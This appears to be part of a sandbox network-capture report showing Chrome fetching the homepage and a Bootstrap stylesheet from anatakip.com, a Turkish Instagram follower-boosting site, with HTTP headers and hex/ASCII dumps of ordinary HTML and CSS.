                    CF-RAY: 88a15d5bb8a17d0c-EWR
                    alt-svc: h3=":443"; ma=86400
                    2024-05-26 22:57:31 UTC540INData Raw: 33 36 39 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 74 72 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 61 73 73 65 74 73 2f 62 6f 6f 74 73 74 72 61 70 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2d 70 61
                    Data Ascii: 3692<!DOCTYPE html><html lang="tr"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="stylesheet" href="/assets/bootstrap/css/bootstrap-pa
                    2024-05-26 22:57:31 UTC1369INData Raw: 2d 61 77 65 73 6f 6d 65 2e 6d 69 6e 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 61 73 73 65 74 73 2f 73 74 79 6c 65 2f 70 61 70 65 72 2e 63 73 73 3f 76 3d 76 33 2e 31 2e 35 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 61 73 73 65 74 73 2f 6e 70 72 6f 67 72 65 73 73 2f 6e 70 72 6f 67 72 65 73 73 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 61 73 73 65 74 73 2f 6c 6f 67 6f 2f 66 61 76 69 63 6f 6e 2e 70 6e 67 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e
                    Data Ascii: -awesome.min.css" type="text/css" media="screen" /><link rel="stylesheet" href="/assets/style/paper.css?v=v3.1.5"><link rel="stylesheet" href="/assets/nprogress/nprogress.css"><link rel="shortcut icon" href="/assets/logo/favicon.png" type="image/x-icon
                    2024-05-26 22:57:31 UTC1369INData Raw: 4c 61 79 65 72 20 3d 20 77 69 6e 64 6f 77 2e 64 61 74 61 4c 61 79 65 72 20 7c 7c 20 5b 5d 3b 0a 0a 09 09 09 09 66 75 6e 63 74 69 6f 6e 20 67 74 61 67 28 29 20 7b 64 61 74 61 4c 61 79 65 72 2e 70 75 73 68 28 61 72 67 75 6d 65 6e 74 73 29 3b 7d 0a 0a 09 09 09 09 67 74 61 67 28 27 6a 73 27 2c 20 6e 65 77 20 44 61 74 65 28 29 29 3b 0a 0a 09 09 09 09 67 74 61 67 28 27 63 6f 6e 66 69 67 27 2c 20 27 47 2d 54 31 4b 35 46 52 32 37 51 36 27 29 3b 0a 09 09 09 3c 2f 73 63 72 69 70 74 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 65 61 64 65 72 3e 0a 3c 6e 61 76 20 63 6c 61 73 73 3d 22 6e 61 76 62 61 72 20 6e 61 76 62 61 72 2d 64 65 66 61 75 6c 74 20 6e 61 76 62 61 72 2d 66 69 78 65 64 2d 74 6f 70 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61
                    Data Ascii: Layer = window.dataLayer || [];function gtag() {dataLayer.push(arguments);}gtag('js', new Date());gtag('config', 'G-T1K5FR27Q6');</script></head><body><header><nav class="navbar navbar-default navbar-fixed-top"><div class="conta
                    2024-05-26 22:57:31 UTC1369INData Raw: 68 65 61 64 20 68 31 20 7b 0d 0a 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 30 3b 0d 0a 09 7d 0d 0a 0d 0a 09 73 65 63 74 69 6f 6e 2e 68 65 61 64 20 68 31 20 61 2c 20 73 65 63 74 69 6f 6e 2e 68 65 61 64 20 68 33 20 73 70 61 6e 2c 20 73 65 63 74 69 6f 6e 2e 68 65 61 64 20 68 34 20 73 70 61 6e 2c 20 73 65 63 74 69 6f 6e 2e 68 65 61 64 20 70 20 7b 0d 0a 09 09 63 6f 6c 6f 72 3a 20 77 68 69 74 65 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0d 0a 09 7d 0d 0a 0d 0a 09 73 65 63 74 69 6f 6e 2e 68 65 61 64 20 70 20 61 3a 6e 6f 74 28 2e 62 74 6e 29 20 7b 0d 0a 09 09 63 6f 6c 6f 72 3a 20 61 71 75 61 3b 0d 0a 09 7d 0d 0a 0d 0a 09 2e 64 65 73 63 72 69 70 74 69 6f 6e 42 6c 6f 63 6b 20 7b 0d 0a 09 09 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0d 0a 09 09 74 65 78 74 2d 61 6c 69
                    Data Ascii: head h1 {margin-top: 0;}section.head h1 a, section.head h3 span, section.head h4 span, section.head p {color: white !important;}section.head p a:not(.btn) {color: aqua;}.descriptionBlock {display: block;text-ali
                    2024-05-26 22:57:31 UTC1369INData Raw: 20 7b 0d 0a 20 20 62 6f 72 64 65 72 2d 6c 65 66 74 2d 63 6f 6c 6f 72 3a 20 23 64 39 35 33 34 66 3b 20 2f 2a 20 4c 65 66 74 20 73 69 64 65 20 62 6f 72 64 65 72 20 63 6f 6c 6f 72 20 2a 2f 0d 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 72 67 62 61 28 32 31 37 2c 20 38 33 2c 20 37 39 2c 20 30 2e 31 29 3b 20 2f 2a 20 53 61 6d 65 20 63 6f 6c 6f 72 20 61 73 20 74 68 65 20 6c 65 66 74 20 62 6f 72 64 65 72 20 77 69 74 68 20 72 65 64 75 63 65 64 20 61 6c 70 68 61 20 74 6f 20 30 2e 31 20 2a 2f 0d 0a 7d 0d 0a 0d 0a 2e 64 61 6e 67 65 72 20 73 74 72 6f 6e 67 20 7b 0d 0a 20 20 63 6f 6c 6f 72 3a 20 20 23 64 39 35 33 34 66 3b 0d 0a 7d 0d 0a 0d 0a 2e 77 61 72 6e 69 6e 67 20 7b 0d 0a 20 20 62 6f 72 64 65 72 2d 6c 65 66 74 2d 63 6f 6c 6f 72 3a 20 23 66 30
                    Data Ascii: { border-left-color: #d9534f; /* Left side border color */ background-color: rgba(217, 83, 79, 0.1); /* Same color as the left border with reduced alpha to 0.1 */}.danger strong { color: #d9534f;}.warning { border-left-color: #f0
                    2024-05-26 22:57:31 UTC1369INData Raw: 72 6f 72 2d 6e 6f 74 69 63 65 22 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 22 3e 3c 2f 70 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 6e 6f 74 69 63 65 22 3e 0a 3c 70 3e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 22 3e 0a 3c 64 69 76 20 61 72 69 61 2d 6d 75 6c 74 69 73 65 6c 65 63 74 61 62 6c 65 3d 22 74 72 75 65 22 20 63 6c 61 73 73 3d 22 70 61 6e 65 6c 2d 67 72 6f 75 70 22 20 72 6f 6c 65 3d 22 74 61 62 6c 69 73 74 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 61 6e 65 6c 20 70 61 6e 65 6c 2d 63 6f 6c 6c
                    Data Ascii: ror-notice"><p style="text-align: center;"></p><div class="row"><div class="error-notice"><p></p></div></div><div class="container"><div class="row"><div aria-multiselectable="true" class="panel-group" role="tablist"><div class="panel panel-coll
                    2024-05-26 22:57:31 UTC1369INData Raw: 6c 2d 68 65 61 64 69 6e 67 22 20 69 64 3d 22 68 65 61 64 69 6e 67 31 22 20 72 6f 6c 65 3d 22 74 61 62 22 3e 0a 3c 68 34 20 63 6c 61 73 73 3d 22 70 61 6e 65 6c 2d 74 69 74 6c 65 22 3e 3c 61 20 61 72 69 61 2d 63 6f 6e 74 72 6f 6c 73 3d 22 54 61 6b 69 70 63 69 48 69 6c 65 73 69 22 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 3d 22 66 61 6c 73 65 22 20 63 6c 61 73 73 3d 22 63 6f 6c 6c 61 70 73 65 64 22 20 64 61 74 61 2d 70 61 72 65 6e 74 3d 22 23 61 63 63 6f 72 64 69 6f 6e 22 20 64 61 74 61 2d 74 6f 67 67 6c 65 3d 22 63 6f 6c 6c 61 70 73 65 22 20 68 72 65 66 3d 22 23 54 61 6b 69 70 63 69 48 69 6c 65 73 69 22 3e 3c 69 20 63 6c 61 73 73 3d 22 66 61 20 66 61 2d 70 6c 75 73 22 3e 3c 2f 69 3e 20 3c 2f 61 3e 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23
                    Data Ascii: l-heading" id="heading1" role="tab"><h4 class="panel-title"><a aria-controls="TakipciHilesi" aria-expanded="false" class="collapsed" data-parent="#accordion" data-toggle="collapse" href="#TakipciHilesi"><i class="fa fa-plus"></i> </a><span style="color:#
                    2024-05-26 22:57:31 UTC1369INData Raw: c4 b0 6e 73 74 61 67 72 61 6d 20 64 61 20 68 65 72 6b 65 73 20 66 65 6e 6f 6d 65 6e 20 6f 6c 6d 61 6b 20 69 73 74 65 72 20 62 75 6e 75 6e 20 65 6e 20 62 61 73 69 74 20 79 6f 6c 75 20 6b 65 c5 9f 66 65 74 20 64 c3 bc c5 9f 6d 65 6b 74 69 72 2e 4b 65 73 66 65 74 65 20 64 c3 bc c5 9f 6d 65 6e 69 6e 64 65 20 65 6e 20 6b 6f 6c 61 79 20 79 6f 6c 75 20 67 c3 b6 6e 64 65 72 69 6c 65 72 69 6e 69 7a 69 6e 20 61 6c 74 c4 b1 6e 64 61 6b 69 20 79 6f 72 75 6d 6c 61 72 64 c4 b1 72 2e 47 c3 b6 6e 64 65 72 69 6c 65 72 69 6e 69 7a 69 6e 20 61 6c 74 c4 b1 6e 64 61 20 6e 65 20 6b 61 64 61 72 20 c3 a7 6f 6b 20 79 6f 72 75 6d 20 76 61 72 73 61 20 6b 65 c5 9f 66 65 74 65 20 c3 a7 c4 b1 6b 6d 61 20 6f 72 61 6e c4 b1 6e c4 b1 7a 20 69 6e 73 61 6e 6c 61 72 c4 b1 6e 20 73 69 7a 69
                    Data Ascii: nstagram da herkes fenomen olmak ister bunun en basit yolu kefet dmektir.Kesfete dmeninde en kolay yolu gnderilerinizin altndaki yorumlardr.Gnderilerinizin altnda ne kadar ok yorum varsa kefete kma orannz insanlarn sizi
                    2024-05-26 22:57:31 UTC1369INData Raw: 6c 6c 61 6e 61 62 69 6c 69 72 2e 20 49 6e 73 74 61 67 72 61 6d 20 68 65 73 61 62 c4 b1 6e c4 b1 7a 6c 61 20 67 69 72 69 c5 9f 20 79 61 70 c4 b1 6e 20 76 65 20 68 65 6d 65 6e 20 6b 75 6c 6c 61 6e 6d 61 79 61 20 62 61 c5 9f 6c 61 79 c4 b1 6e 2e 20 4b 75 6c 6c 61 6e c4 b1 6d 20 c3 bc 63 72 65 74 73 69 7a 64 69 72 2e 20 4b 72 65 64 69 20 73 61 74 c4 b1 6e 20 61 6c 6d 61 64 c4 b1 6b c3 a7 61 20 68 69 c3 a7 62 69 72 20 c3 bc 63 72 65 74 20 c3 b6 64 65 6d 65 7a 73 69 6e 69 7a 2e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6d 64 2d 33 22 3e 0a 3c 68 35 3e 42 69 7a 65 20 55 6c 61 c5 9f c4 b1 6e 3c 2f 68 35 3e 0a 3c 70 3e 48 65 72 20 74 c3 bc 72 6c c3 bc 20 73 6f 72 75 20 76 65 20 67 c3 b6 72 c3 bc c5 9f 6c 65 72 69 6e 69 7a
                    Data Ascii: llanabilir. Instagram hesabnzla giri yapn ve hemen kullanmaya balayn. Kullanm cretsizdir. Kredi satn almadka hibir cret demezsiniz.</p></div><div class="col-md-3"><h5>Bize Ulan</h5><p>Her trl soru ve grleriniz
                    2024-05-26 22:57:31 UTC1369INData Raw: 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 09 09 09 09 09 09 28 66 75 6e 63 74 69 6f 6e 20 28 69 2c 20 73 2c 20 6f 2c 20 67 2c 20 72 2c 20 61 2c 20 6d 29 20 7b 0a 09 09 09 09 69 5b 27 47 6f 6f 67 6c 65 41 6e 61 6c 79 74 69 63 73 4f 62 6a 65 63 74 27 5d 20 3d 20 72 3b 0a 09 09 09 09 69 5b 72 5d 20 3d 20 69 5b 72 5d 20 7c 7c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 09 09 09 09 09 28 69 5b 72 5d 2e 71 20 3d 20 69 5b 72 5d 2e 71 20 7c 7c 20 5b 5d 29 2e 70 75 73 68 28 61 72 67 75 6d 65 6e 74 73 29 0a 09 09 09 09 7d 2c 20 69 5b 72 5d 2e 6c 20 3d 20 31 20 2a 20 6e 65 77 20 44 61 74 65 28 29 3b 0a 09 09 09 09 61 20 3d 20 73 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 6f 29 2c 0a 09 09 09 09 09 6d 20 3d 20 73 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54
                    Data Ascii: xt/javascript">(function (i, s, o, g, r, a, m) {i['GoogleAnalyticsObject'] = r;i[r] = i[r] || function () {(i[r].q = i[r].q || []).push(arguments)}, i[r].l = 1 * new Date();a = s.createElement(o),m = s.getElementsByT


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    3192.168.2.549720104.21.27.834433788C:\Program Files\Google\Chrome\Application\chrome.exe
                    TimestampBytes transferredDirectionData
                    2024-05-26 22:57:32 UTC642OUTGET /assets/bootstrap/css/bootstrap-paper.min.css HTTP/1.1
                    Host: anatakip.com
                    Connection: keep-alive
                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                    sec-ch-ua-mobile: ?0
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                    sec-ch-ua-platform: "Windows"
                    Accept: text/css,*/*;q=0.1
                    Sec-Fetch-Site: same-origin
                    Sec-Fetch-Mode: no-cors
                    Sec-Fetch-Dest: style
                    Referer: https://anatakip.com/
                    Accept-Encoding: gzip, deflate, br
                    Accept-Language: en-US,en;q=0.9
                    Cookie: df22fd5cb3c2d86bdf715369b47b4428=bf7e3d95e99bd43927c4807425b30e01
                    2024-05-26 22:57:32 UTC758INHTTP/1.1 200 OK
                    Date: Sun, 26 May 2024 22:57:32 GMT
                    Content-Type: text/css
                    Transfer-Encoding: chunked
                    Connection: close
                    cache-control: public, max-age=2592000
                    expires: Tue, 11 Jun 2024 19:01:01 GMT
                    last-modified: Tue, 30 Apr 2024 19:23:27 GMT
                    vary: Accept-Encoding,Accept-Encoding
                    x-turbo-charged-by: LiteSpeed
                    CF-Cache-Status: HIT
                    Age: 1223791
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5Uy9PuLuRMn%2FDQ1vvjnlJmYcRAI9yO7xEd0z6u95jiva9v9IGwy8371c0Qjo9VW7FTxeRupGZBHYvLfI6pNCiJwJDGT0%2F88RdKer0h5KiYnMouIqfgxxU61eoHf9EP4%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 88a15d623ac14291-EWR
                    alt-svc: h3=":443"; ma=86400
                    2024-05-26 22:57:32 UTC611INData Raw: 37 63 62 61 0d 0a 40 69 6d 70 6f 72 74 20 75 72 6c 28 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 33 30 30 2c 34 30 30 2c 35 30 30 2c 37 30 30 22 29 3b 2f 2a 21 0d 0a 20 2a 20 62 6f 6f 74 73 77 61 74 63 68 20 76 33 2e 33 2e 36 0d 0a 20 2a 20 48 6f 6d 65 70 61 67 65 3a 20 68 74 74 70 3a 2f 2f 62 6f 6f 74 73 77 61 74 63 68 2e 63 6f 6d 0d 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 32 2d 32 30 31 35 20 54 68 6f 6d 61 73 20 50 61 72 6b 0d 0a 20 2a 20 4c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 4d 49 54 0d 0a 20 2a 20 42 61 73 65 64 20 6f 6e 20 42 6f 6f 74 73 74 72 61 70 0d 0a 2a 2f 2f 2a 21 0d 0a 20 2a 20 42 6f 6f 74 73 74 72 61 70 20 76 33 2e 33 2e 36
                    Data Ascii: 7cba@import url("https://fonts.googleapis.com/css?family=Roboto:300,400,500,700");/*! * bootswatch v3.3.6 * Homepage: http://bootswatch.com * Copyright 2012-2015 Thomas Park * Licensed under MIT * Based on Bootstrap*//*! * Bootstrap v3.3.6
                    2024-05-26 22:57:32 UTC1369INData Raw: 69 67 75 72 65 2c 66 6f 6f 74 65 72 2c 68 65 61 64 65 72 2c 68 67 72 6f 75 70 2c 6d 61 69 6e 2c 6d 65 6e 75 2c 6e 61 76 2c 73 65 63 74 69 6f 6e 2c 73 75 6d 6d 61 72 79 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 7d 61 75 64 69 6f 2c 63 61 6e 76 61 73 2c 70 72 6f 67 72 65 73 73 2c 76 69 64 65 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 62 61 73 65 6c 69 6e 65 7d 61 75 64 69 6f 3a 6e 6f 74 28 5b 63 6f 6e 74 72 6f 6c 73 5d 29 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 68 65 69 67 68 74 3a 30 7d 5b 68 69 64 64 65 6e 5d 2c 74 65 6d 70 6c 61 74 65 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 61 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 7d 61 3a 61 63 74
                    Data Ascii: igure,footer,header,hgroup,main,menu,nav,section,summary{display:block}audio,canvas,progress,video{display:inline-block;vertical-align:baseline}audio:not([controls]){display:none;height:0}[hidden],template{display:none}a{background-color:transparent}a:act
                    2024-05-26 22:57:32 UTC1369INData Raw: 62 75 74 74 6f 6e 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 6e 75 6d 62 65 72 22 5d 3a 3a 2d 77 65 62 6b 69 74 2d 6f 75 74 65 72 2d 73 70 69 6e 2d 62 75 74 74 6f 6e 7b 68 65 69 67 68 74 3a 61 75 74 6f 7d 69 6e 70 75 74 5b 74 79 70 65 3d 22 73 65 61 72 63 68 22 5d 7b 2d 77 65 62 6b 69 74 2d 61 70 70 65 61 72 61 6e 63 65 3a 74 65 78 74 66 69 65 6c 64 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 2d 6d 6f 7a 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 7d 69 6e 70 75 74 5b 74 79 70 65 3d 22 73 65 61 72 63 68 22 5d 3a 3a 2d 77 65 62 6b 69 74 2d 73 65 61 72 63 68 2d 63 61 6e 63 65 6c 2d 62 75 74 74 6f 6e 2c 69 6e 70 75 74
                    Data Ascii: button,input[type="number"]::-webkit-outer-spin-button{height:auto}input[type="search"]{-webkit-appearance:textfield;-webkit-box-sizing:content-box;-moz-box-sizing:content-box;box-sizing:content-box}input[type="search"]::-webkit-search-cancel-button,input
                    2024-05-26 22:57:32 UTC1369INData Raw: 62 6c 65 20 74 68 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 74 61 62 6c 65 2d 62 6f 72 64 65 72 65 64 20 74 68 2c 2e 74 61 62 6c 65 2d 62 6f 72 64 65 72 65 64 20 74 64 7b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 64 64 64 20 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 40 66 6f 6e 74 2d 66 61 63 65 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 27 47 6c 79 70 68 69 63 6f 6e 73 20 48 61 6c 66 6c 69 6e 67 73 27 3b 73 72 63 3a 75 72 6c 28 27 2e 2e 2f 66 6f 6e 74 73 2f 67 6c 79 70 68 69 63 6f 6e 73 2d 68 61 6c 66 6c 69 6e 67 73 2d 72 65 67 75 6c 61 72 2e 65 6f 74 27 29 3b 73 72 63 3a 75 72 6c 28 27 2e 2e 2f 66 6f 6e 74 73 2f 67 6c 79 70 68 69 63 6f 6e 73 2d 68 61 6c 66 6c 69 6e 67 73 2d 72 65 67 75 6c
                    Data Ascii: ble th{background-color:#fff !important}.table-bordered th,.table-bordered td{border:1px solid #ddd !important}}@font-face{font-family:'Glyphicons Halflings';src:url('../fonts/glyphicons-halflings-regular.eot');src:url('../fonts/glyphicons-halflings-regul
                    2024-05-26 22:57:32 UTC1369INData Raw: 72 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 30 30 38 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 66 69 6c 6d 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 30 30 39 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 74 68 2d 6c 61 72 67 65 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 30 31 30 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 74 68 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 30 31 31 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 74 68 2d 6c 69 73 74 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 30 31 32 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 6f 6b 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 30 31 33 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 72 65 6d 6f 76 65 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74
                    Data Ascii: r:before{content:"\e008"}.glyphicon-film:before{content:"\e009"}.glyphicon-th-large:before{content:"\e010"}.glyphicon-th:before{content:"\e011"}.glyphicon-th-list:before{content:"\e012"}.glyphicon-ok:before{content:"\e013"}.glyphicon-remove:before{content
                    2024-05-26 22:57:32 UTC1369INData Raw: 6f 6e 74 65 6e 74 3a 22 5c 65 30 34 31 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 74 61 67 73 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 30 34 32 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 62 6f 6f 6b 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 30 34 33 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 62 6f 6f 6b 6d 61 72 6b 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 30 34 34 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 70 72 69 6e 74 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 30 34 35 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 63 61 6d 65 72 61 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 30 34 36 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 66 6f 6e 74 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 30 34 37 22
                    Data Ascii: ontent:"\e041"}.glyphicon-tags:before{content:"\e042"}.glyphicon-book:before{content:"\e043"}.glyphicon-bookmark:before{content:"\e044"}.glyphicon-print:before{content:"\e045"}.glyphicon-camera:before{content:"\e046"}.glyphicon-font:before{content:"\e047"
                    2024-05-26 22:57:32 UTC1369INData Raw: 5c 65 30 37 34 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 66 6f 72 77 61 72 64 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 30 37 35 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 66 61 73 74 2d 66 6f 72 77 61 72 64 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 30 37 36 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 73 74 65 70 2d 66 6f 72 77 61 72 64 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 30 37 37 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 65 6a 65 63 74 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 30 37 38 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 63 68 65 76 72 6f 6e 2d 6c 65 66 74 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 30 37 39 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 63 68 65 76 72 6f 6e 2d 72 69 67 68 74 3a
                    Data Ascii: \e074"}.glyphicon-forward:before{content:"\e075"}.glyphicon-fast-forward:before{content:"\e076"}.glyphicon-step-forward:before{content:"\e077"}.glyphicon-eject:before{content:"\e078"}.glyphicon-chevron-left:before{content:"\e079"}.glyphicon-chevron-right:
                    2024-05-26 22:57:32 UTC1369INData Raw: 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 31 30 38 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 63 61 6c 65 6e 64 61 72 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 31 30 39 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 72 61 6e 64 6f 6d 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 31 31 30 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 63 6f 6d 6d 65 6e 74 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 31 31 31 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 6d 61 67 6e 65 74 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 31 31 32 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 63 68 65 76 72 6f 6e 2d 75 70 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 31 31 33 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 63 68 65 76 72 6f 6e 2d 64 6f 77 6e 3a 62
                    Data Ascii: e{content:"\e108"}.glyphicon-calendar:before{content:"\e109"}.glyphicon-random:before{content:"\e110"}.glyphicon-comment:before{content:"\e111"}.glyphicon-magnet:before{content:"\e112"}.glyphicon-chevron-up:before{content:"\e113"}.glyphicon-chevron-down:b
